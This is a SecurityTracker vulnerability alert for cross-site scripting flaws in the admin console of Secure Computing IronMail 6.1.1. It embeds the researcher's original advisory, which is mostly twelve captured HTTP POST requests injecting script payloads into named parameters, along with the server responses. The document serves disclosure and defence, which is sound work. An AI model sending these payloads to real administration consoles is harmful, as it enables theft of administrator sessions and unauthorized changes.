SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Embedded Server/Appliance)  >   McAfee Email Gateway Vendors:   CipherTrust, Secure Computing
Secure Computing IronMail Multiple Input Validation Holes Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1017821
SecurityTracker URL:  http://securitytracker.com/id/1017821
CVE Reference:   CVE-2007-1723   (Links to External Site)
Date:  Mar 28 2007
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 6.1.1
Description:   A vulnerability was reported in Secure Computing IronMail. A remote user can conduct cross-site scripting attacks.

Several scripts on the administration console do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted HTTP request that, when loaded or submitted by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the IronMail device and will run in the security context of that device. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.

Multiple scripts and parameters are affected.

The vendor was notified on February 27, 2007.

Javier Olascoaga reported this vulnerability.

The original advisory is available at:

http://www.514.es/2007/03/siaadv07004_multiples_vulnerab.html

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the IronMail device, access data recently submitted by the target user via web form to the device, or take actions on the device acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ciphertrust.com/products/ironmail/ (Links to External Site)
Cause:   Input validation error

Message History:   None.


 Source Message Contents

Subject:  Multiple XSS in IronMail

This is a MIME-formatted message.  If you see this text it means that your
E-mail software does not support MIME-formatted messages.

--=_gantz-15840-1174901611-0001-2
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Founded multiple XSS in IronMail.

See attached advisory. Spanish version in http://www.514.es.

Regards,

- J

--=_gantz-15840-1174901611-0001-2
Content-Type: text/plain; name="SIAADV-07-004-EN.txt"; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline;
 filename="SIAADV-07-004-EN.txt"

          =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
                   - Advisory -
          =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 =20
  T=EDtulo:   Multipls XSS in Cypherstrust Ironmail 6.1.1
    Risk:   Medium
    Date:   20.Feb.2007
  Author:   Javier Olascoaga <jolascoaga *at* 514.es>     =20
     WEB:   http://www.514.es/


=2E: [ INTRO ] :.
=09
IronMail protects enterprise email systems from inbound threats: spam, vi=
ruses;
or hackers trying to take down or take over the e-mail system. IronMail p=
rotects
enterprise email systems from outbound threats: regulatory compliance vio=
lations
, corporate policy violations, or theft ("leakage") of confidential infor=
mation=20
or intellectual property. IronMail protects enterprise email systems from=
 threats that haven't even been identified yet.=20

=2E: [ TECHNICAL DESCRIPTION ] :.

During the development of the technical tests against the IronMail mail s=
ystem=20
have been detected several Cross Site Scripting vulnerabilities in the=20
administration console of the product.


Next you can find the XSS founded:

=2E: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=3Dsubmit HTTP/=
1.1
Referer:
https://172.0.0.2:10443/admin/systemRouting.do?method=3Dinit&isMenuToggle=
d=3D1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=3D53DFBE4753D221B2707050E96902E98D_admin;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fme=
thod%3Dinit%26isMenuToggled%3D1;
menusToExpand=3D%2CConfigurationMenu%2C; tabbedMenuSelected=3D11;
/admin/queueManager.dofirsttimeload=3D1; /admin/queueManager.do=3D;
JSESSIONID=3DB227892A258E91419C09469E49AED4D4
  'rows%5B0%5D.networkId=3D172.16.0.0&rows%5B0%5D.netmaskId=3D255.255.0.0=
&rows%5B1%5D.networkId=3D192.168.0.0&rows%5B1%5D.netmaskId=3D255.255.0.0&=
network=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=3D=
128.0.0.0&defRouterIp=3D%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscri=
pt%3E&submit=3DSubmit


=2E: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT=
TP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/system_IronMail.do?method=3DgetDetail&isMen=
uToggled=3D1
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F=
method%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
Wmtu=3D1500&hostName=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript=
%3E&domainName=3Dsytes.net&ipAddress=3D10.1.1.1&ipNetMask=3D255.255.255.2=
24&defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1=
=2E5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZ=
one=3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT=
TP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe=
w
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F=
method%3DsaveNew;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
Umtu=3D1500&hostName=3Dmmail11&domainName=3D%27%3E%3Cscript%3Ealert%28%27=
SIA%27%29%3C%2Fscript%3E&ipAddress=3D10.1.1.1&ipNetMask=3D255.255.255.224=
&defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1.5=
&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone=3D=
Europe%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT=
TP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe=
w
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F=
method%3DsaveNew;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D%27%3E%=
3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=3D255.255.255.22=
4&defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1.=
5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone=
=3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT=
TP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe=
w
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F=
method%3DsaveNew;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
Qmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D10.1.1.=
1&ipNetMask=3D255.255.255.224&defaultRouter=3D%27%3E%3Cscript%3Ealert%28%=
27SIA%27%29%3C%2Fscript%3E&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1.=
5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone=
=3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT=
TP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe=
w
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F=
method%3DsaveNew;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
Rmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D10.1.1.=
1&ipNetMask=3D255.255.255.224&defaultRouter=3D10.1.1.2&dns1=3D%27%3E%3Csc=
ript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=3D10.1.1.4&dns3=3D10.1.1.=
5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone=
=3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT=
TP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe=
w
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F=
method%3DsaveNew;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
Tmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D10.1.1.=
1&ipNetMask=3D255.255.255.224&defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dn=
s2=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=3D10.1.1.=
5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone=
=3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8


=2E: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=3DsaveNew HT=
TP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=3DgetDetail&isMen=
uToggled=3D1
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3F=
method%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
outOfBand=3Dtrue&mtu=3D1500&ipAddress=3D%27%3E%3Cscript%3Ealert%28%27SIA%=
27%29%3C%2Fscript%3E&ethernetSetting=3Dautoselect&ipNetMask=3D255.255.255=
=2E224&submit=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=3Dsubmit HTTP/1=
=2E1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemBackup.do?method=3Dinit&isMenuToggled=
=3D1
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmet=
hod%3Dinit%26isMenuToggled%3D1;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
password=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmP=
assword=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=3D=
Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=3Dsubmi=
t
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=3Dinit&isMen=
uToggled=3D1
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D17;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemLicenseManager.=
do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=3D%2CConfigurationMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
Klicense=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=3D=
Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=3Dsave
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=3Dinit&isMen=
uToggled=3D1&procId=3D90
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D15;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.=
do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc=
countMenu%2C;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
procId=3D90&rows%5B0%5D.attrName=3Dgui_log_level&rows%5B0%5D.attrType=3D1=
2&rows%5B0%5D.attrValidate=3D%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+Labe=
lValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+Lab=
elValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=3D30060003%=
3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=3D=
&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.modifyable=3Dtrue&rows%5B0%5D.=
attrValueStrClone=3D4&rows%5B0%5D.langTagId=3D2000003&rows%5B0%5D.attrVal=
ue=3D4&rows%5B1%5D.attrName=3Dgui_timeout&rows%5B1%5D.attrType=3D2&rows%5=
B1%5D.attrValidate=3D%5B1-30%5D&rows%5B1%5D.attrValidateStr=3D%5B1-30%5D&=
rows%5B1%5D.attrDepends=3D&rows%5B1%5D.multipleValue=3D0&rows%5B1%5D.modi=
fyable=3Dtrue&rows%5B1%5D.attrValueStrClone=3D30&rows%5B1%5D.langTagId=3D=
2001014&rows%5B1%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29=
%3C%2Fscript%3E&rows%5B2%5D.attrName=3Dauto_refresh&rows%5B2%5D.attrType=3D=
2&rows%5B2%5D.attrValidate=3D%5B1-30%5D&rows%5B2%5D.attrValidateStr=3D%5B=
1-30%5D&rows%5B2%5D.attrDepends=3D&rows%5B2%5D.multipleValue=3D0&rows%5B2=
%5D.modifyable=3Dtrue&rows%5B2%5D.attrValueStrClone=3D4&rows%5B2%5D.langT=
agId=3D2001017&rows%5B2%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SI=
A2%27%29%3C%2Fscript%3E&submitValue=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #12 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
init&procId=3D164
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D11;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService=
Properties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc=
countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD=
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro=
ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24=
%5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.=
modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI=
d=3D2016401&rows%5B0%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA%2=
7%29%3C%2Fscript%3E&rows%5B1%5D.attrName=3Dsync_results_count&rows%5B1%5D=
=2EattrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5D&rows%5B1%5D.attrVa=
lidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&rows%5B1%5D.multipleVa=
lue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.attrValueStrClone=3D50&=
rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValueStr=3D50&rows%5B2%5D=
=2EattrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1&rows%5B2%5D.attrV=
alidate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.attrDepends=3D&rows=
%5B2%5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue&rows%5B2%5D.attrV=
alueStrClone=3D&rows%5B2%5D.langTagId=3D2016403&rows%5B2%5D.attrValue=3D&=
rows%5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5=
D.attrValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D=
&rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.=
attrValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrVal=
ue=3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D=
2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B=
1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4=
%5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT=
agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m=
onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144=
0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D=
&rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.=
attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal=
ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1=
2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe=
lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe=
lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV=
alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La=
belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060=
019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300=
60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5=
B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal=
ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&=
rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%=
5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep=
ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%=
5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D=
Submit
HTTP/1.0 200 OK
